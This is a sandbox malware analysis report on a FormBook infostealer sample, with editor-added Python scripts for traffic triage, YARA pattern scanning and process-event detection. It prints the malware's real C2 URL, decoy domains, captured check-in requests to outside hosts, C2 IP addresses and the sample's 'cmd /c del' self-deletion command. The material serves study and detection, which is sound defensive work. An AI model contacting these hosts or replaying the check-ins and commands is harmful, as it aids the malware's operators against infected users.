Windows Analysis Report PQMW0W5h3X.exe

Overview

General Information

Sample Name: PQMW0W5h3X.exe
Analysis ID: 438543
MD5: 6b26db585f40e14b00b5adda57e595dd
SHA1: ffbb4390c5cdb9d0aa78061399f5a9993a955dd3
SHA256: 8b39bf75ce8ca2ecadafeb01a2ff33fc07419198e5b222bf20385ecbf2da0ff4
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • PQMW0W5h3X.exe (PID: 6528 cmdline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: 6B26DB585F40E14B00B5ADDA57E595DD)
    • PQMW0W5h3X.exe (PID: 6608 cmdline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: 6B26DB585F40E14B00B5ADDA57E595DD)
  • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • rundll32.exe (PID: 6820 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 7032 cmdline: /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
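The configuration pairs a single real C2 URL (`www.extinctionbrews.com/dy8g/`) with 64 decoy domains. FormBook sends the same `/dy8g/` check-in, with no User-Agent header, to the decoys as well as to the genuine server, so the real infrastructure hides inside a burst of look-alike traffic; the Networking section below shows exactly that. The script that follows is an editor's example added to this page, not code from Joe Sandbox or from the malware: it parses raw HTTP requests, normalises the `www.` prefix FormBook prepends, and labels each request as the real C2, a known decoy, an unknown host using the same check-in path (worth watching as possible new infrastructure), or unrelated. The first three requests are the sandbox's captured check-ins re-serialised as HTTP; the decoy list is trimmed to the domains seen in the traffic; the `example.com` and `example.net` requests are constructed negative and edge-case inputs.

```python
"""Triage captured HTTP check-ins against an extracted FormBook configuration."""
import re
from urllib.parse import urlsplit

# Extracted configuration (Malware Configuration section above). Only the
# decoys that also appear in the captured traffic are repeated; the report
# lists 64 of them.
CONFIG = {
    "C2 list": ["www.extinctionbrews.com/dy8g/"],
    "decoy": [
        "invisiongc.net", "killrstudio.com", "ivoirepneus.com",
        "cindywillardrealtor.com", "doityourselfism.com", "builtbydawn.com",
        "qq66520.com", "mzyxi-rkah-y.net", "thenorthgoldline.com",
        "guys-only.com", "wideawakemomma.com",
    ],
}

# First three: check-ins captured by the sandbox (Networking section above).
# Last two: constructed inputs, not from the report, to exercise the
# 'unrelated' and 'path-only' outcomes.
RAW_REQUESTS = [
    "GET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1\r\n"
    "Host: www.invisiongc.net\r\nConnection: close\r\n\r\n",
    "GET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1\r\n"
    "Host: www.extinctionbrews.com\r\nConnection: close\r\n\r\n",
    "GET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1\r\n"
    "Host: www.qq66520.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
    "GET /dy8g/?6l-=6lY0 HTTP/1.1\r\nHost: www.example.net\r\nConnection: close\r\n\r\n",
]

REQUEST_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]\r?\n", re.I)


def normalize_host(host):
    """Lower-case, drop a trailing dot and the 'www.' prefix FormBook prepends."""
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def config_indicators(config):
    """Split the config into (c2 hosts, decoy hosts, check-in paths)."""
    c2_hosts, paths = set(), set()
    for entry in config["C2 list"]:
        parts = urlsplit("http://" + entry)
        c2_hosts.add(normalize_host(parts.hostname))
        paths.add(parts.path)
    decoys = {normalize_host(d) for d in config["decoy"]}
    return c2_hosts, decoys, paths


def parse_request(raw):
    """Return (method, request-uri, headers dict) for one raw HTTP/1.x request."""
    m = REQUEST_LINE.match(raw)
    if not m:
        raise ValueError("not an HTTP request: %r" % raw[:40])
    headers = {}
    for line in raw[m.end():].split("\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return m.group(1).upper(), m.group(2), headers


def classify(config, raw_requests):
    """Label each request; result tuples are (host, path, label, user_agent_missing)."""
    c2_hosts, decoys, paths = config_indicators(config)
    results = []
    for raw in raw_requests:
        _method, uri, headers = parse_request(raw)
        host = normalize_host(headers.get("host", ""))
        path = urlsplit(uri).path
        if path in paths and host in c2_hosts:
            label = "c2"
        elif path in paths and host in decoys:
            label = "decoy"
        elif path in paths:
            label = "path-only"      # same check-in path, host not in this config
        else:
            label = "unrelated"
        results.append((host, path, label, "user-agent" not in headers))
    return results


def summary(results):
    """Count labels: block 'c2', investigate 'path-only', do not chase decoys."""
    counts = {}
    for _host, _path, label, _no_ua in results:
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    verdicts = classify(CONFIG, RAW_REQUESTS)
    for host, path, label, no_ua in verdicts:
        print("%-26s %-12s %-10s user-agent missing=%s" % (host, path, label, no_ua))
    print(summary(verdicts))
```

Blocking every host in the decoy list is a waste of effort and may break legitimate sites; the actionable indicators are the C2 host, the `/dy8g/` path combined with a missing User-Agent, and any "path-only" host, which suggests a configuration the extractor has not seen.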

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump matches are not shown in this excerpt)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
0.2.PQMW0W5h3X.exe.22c0000.2.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PQMW0W5h3X.exe.22c0000.2.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further unpacked-PE matches are not shown in this excerpt)
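Two details in the tables above are worth reading rather than just counting. The yara-signator `$sequence_0` bytes `03 C8 0F 31 2B C1 89 45 FC` decode to `add ecx, eax / rdtsc / sub eax, ecx / mov [ebp-4], eax`, a timestamp-counter delta, which is the code behind the "Tries to detect virtualization through RDTSC time measurements" signature. The JPCERT/CC strings are each a single five-byte `push imm32` (opcode `68`): the rule keys on constants the sample pushes before resolving the sqlite3 step/column_text/column_blob routines it uses to read browser databases. The same strings sit a constant 0xE00 lower in the `.unpack` copy than in the `.raw.unpack` copy (`0x77f8` versus `0x85f8`, `0x138a5` versus `0x146a5`), which is consistent with the file-layout versus memory-layout difference of one image, so the two tables are two views of the same code, not two detections.

The scanner below is an added example written for this page, not a tool from Joe Sandbox or from either rule author. It searches a buffer for those byte patterns, reports the offsets the way the tables do, and decodes the pushed constants. The test image is constructed (NOP filler with the patterns written at the offsets the report gives for the dump at `0x2C0000`), and the `verdict` condition is the author's own, not the rules' actual YARA conditions.

```python
"""Scan a memory image for the byte patterns the community FormBook YARA rules use."""
import struct

# Patterns copied from the Yara Overview above; keys are the rules' own string names.
SIGNATURES = {
    "Formbook_1:$sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),  # add/rdtsc/sub/mov
    "Formbook_1:$sequence_5": bytes.fromhex("0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06"),
    "Formbook:$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),   # push 0xE17B1C34
    "Formbook:$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),   # push 0xC5902A38
    "Formbook:$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),   # push 0x8C7FD853
}

# Offsets reported for the 0x2C0000 dump (Memory Dumps table above); used only
# to lay out the constructed test image.
REPORTED_OFFSETS = {
    "Formbook_1:$sequence_0": [0x85F8, 0x8992],
    "Formbook_1:$sequence_5": [0x93AA],
    "Formbook:$sqlite3step": [0x166C9, 0x167DC],
    "Formbook:$sqlite3text": [0x166F8, 0x1681D],
    "Formbook:$sqlite3blob": [0x1670B, 0x16833],
}


def build_test_image(size=0x20000):
    """Constructed image: NOP filler with each pattern at its reported offset.

    This is not FormBook code; it only reproduces where the strings sit."""
    img = bytearray(b"\x90" * size)
    for name, offsets in REPORTED_OFFSETS.items():
        for off in offsets:
            img[off:off + len(SIGNATURES[name])] = SIGNATURES[name]
    return bytes(img)


def scan(image, signatures):
    """Return {name: [offsets]} for every (possibly overlapping) occurrence."""
    hits = {}
    for name, pattern in signatures.items():
        found, start = [], 0
        while (pos := image.find(pattern, start)) != -1:
            found.append(pos)
            start = pos + 1
        if found:
            hits[name] = found
    return hits


def push_immediates(signatures):
    """Decode the imm32 of every 5-byte 'push imm32' (opcode 0x68) pattern."""
    return {name: struct.unpack_from("<I", pat, 1)[0]
            for name, pat in signatures.items()
            if len(pat) == 5 and pat[0] == 0x68}


def verdict(hits, min_sequences=2):
    """Decision used here (not the rules' own conditions): all three JPCERT
    push patterns present, or at least min_sequences yara-signator sequences."""
    jpcert = {n for n in hits if n.startswith("Formbook:")}
    signator = {n for n in hits if n.startswith("Formbook_1:")}
    return len(jpcert) == 3 or len(signator) >= min_sequences


if __name__ == "__main__":
    image = build_test_image()
    hits = scan(image, SIGNATURES)
    for name, offsets in hits.items():
        print(name, [hex(o) for o in offsets])
    print({n: hex(v) for n, v in push_immediates(SIGNATURES).items()})
    print("formbook:", verdict(hits))
```

To run it against a real dump, replace `build_test_image()` with the bytes of the `.sdmp` file; the offsets printed are relative to the start of the dump, exactly as in the tables above.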

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820
Sigma detected: Suspicious Process Start Without DLL
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820
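All three Sigma hits fire on one event: explorer.exe (PID 3440) starts `C:\Windows\SysWOW64\rundll32.exe` (PID 6820) with nothing after the image path, no DLL and no export name. A legitimate rundll32 launch always names a DLL, so an argument-less start is a sacrificial host process, here created by the explorer.exe that FormBook injected into; the Process Tree shows that rundll32.exe then running `cmd.exe /c del` against the original sample to remove it from disk. The script below is an added example for this page (it is not Joe Sandbox's code and does not reproduce the Sigma rules' YAML verbatim): it approximates the three rules over process-creation events rebuilt from the Process Tree and correlates each hit with its parent so the cleanup step is tied back to the sacrificial process. Assumptions: the cmd.exe image path (the report prints only its arguments), the benign control event with PID 4242, and the rule-name strings in the output are all the editor's.

```python
"""Process-creation checks approximating the report's three Sigma hits."""
import ntpath
import re

# Events rebuilt from the Process Tree above. The cmd.exe image path is assumed
# (the report shows only its arguments) and the last event is a constructed,
# benign rundll32 launch used as a negative control.
EVENTS = [
    {"ProcessId": 3440, "ParentProcessId": 0,
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
    {"ProcessId": 6820, "ParentProcessId": 3440,
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"C:\Windows\SysWOW64\rundll32.exe"},
    {"ProcessId": 7032, "ParentProcessId": 6820,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",            # path assumed
     "CommandLine": r"cmd.exe /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe'"},
    {"ProcessId": 4242, "ParentProcessId": 3440,          # constructed, benign
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL'},
]

# 'cmd /c del <path>.exe' with the path optionally quoted either way.
DEL_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+\.exe)['\"]?", re.I)


def image_name(event):
    return ntpath.basename(event["Image"]).lower()


def arguments(event):
    """Everything after the executable token of CommandLine (quotes tolerated)."""
    cmd = event["CommandLine"].strip()
    m = re.match(r'^"?[^"]*?' + re.escape(image_name(event)) + r'"?\s*(.*)$', cmd, re.I)
    return m.group(1) if m else cmd


def rundll32_without_arguments(event):
    """Approximates 'Suspicious Rundll32 Without Any CommandLine Params' and
    'Suspicious Process Start Without DLL': rundll32.exe with an empty argument string."""
    return image_name(event) == "rundll32.exe" and arguments(event) == ""


def cmd_deletes_executable(event):
    """Return the .exe path removed by a 'cmd /c del' (FormBook's cleanup), else None."""
    if image_name(event) != "cmd.exe":
        return None
    m = DEL_RE.search(event["CommandLine"])
    return m.group(1) if m else None


def evaluate(events):
    """Map ProcessId -> list of rule names, correlating each hit with its parent."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits = {}
    for ev in events:
        names = []
        parent = by_pid.get(ev["ParentProcessId"])
        if rundll32_without_arguments(ev):
            names.append("rundll32_without_arguments")
            # Sacrificial-process pattern: an (injected) explorer.exe spawns it.
            if parent and image_name(parent) == "explorer.exe":
                names.append("sacrificial_rundll32_from_explorer")
        if cmd_deletes_executable(ev):
            names.append("cmd_deletes_executable")
            if parent and rundll32_without_arguments(parent):
                names.append("cleanup_from_sacrificial_rundll32")
        if names:
            hits[ev["ProcessId"]] = names
    return hits


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, ", ".join(names))
```

The parent check matters in production: rundll32.exe without arguments is rare but not unique to FormBook, while "argument-less rundll32 spawned by explorer.exe, followed by a child cmd.exe deleting an executable under a user profile" is specific enough to page on.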

Signature Overview

AV Detection:

Found malware configuration
Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (the configuration listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: PQMW0W5h3X.exe | Virustotal: Detection: 17%
Source: PQMW0W5h3X.exe | ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PQMW0W5h3X.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.rundll32.exe.4d4be0.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.rundll32.exe.4ac7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: PQMW0W5h3X.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: PQMW0W5h3X.exe, 00000000.00000003.330363976.00000000097A0000.00000004.00000001.sdmp, PQMW0W5h3X.exe, 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: PQMW0W5h3X.exe, rundll32.exe
Source: Binary string: rundll32.pdb | source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL | source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 0_2_00402671 FindFirstFileA,
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\PQMW0W5h3X.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
